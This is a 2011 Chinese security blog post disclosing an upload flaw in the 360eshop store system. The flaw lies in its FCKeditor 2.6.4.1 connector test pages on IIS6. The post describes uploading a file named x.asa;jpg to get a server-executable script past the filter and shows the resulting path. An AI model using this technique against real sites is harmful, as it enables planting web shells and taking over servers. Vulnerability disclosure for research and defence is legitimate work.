360eshop安全网店系统0day

标题: 360eshop安全网店系统0day

内容: 360eshop安全网店系统 采用FCK编译器 版本:2.6.4.1 

测试平台:IIS6

测试方法:
-----------------------------------------------------------------------
                           警    告

以下测试方法可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

                         by: HUC 08小组
-----------------------------------------------------------------------

http://www.unhonker.com/expansion/fckeditor/editor/filemanager/connectors/test.html

http://www.unhonker.com/expansion/fckeditor/editor/filemanager/connectors/uploadtest.html

这个两个页面,是漏洞的关键,格式 x.asa;jpg 顺利上传,文件路径也出来了,

/uploadfile/FCK_201109260018186311.ASA;JPG

关键字就不发了,还是自己找吧。

本文固定链接: https://www.unhonker.com/bug/299.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年09月28日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 360eshop安全网店系统0day | 90' s Blog|关注网络信息安全

360eshop安全网店系统0day:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!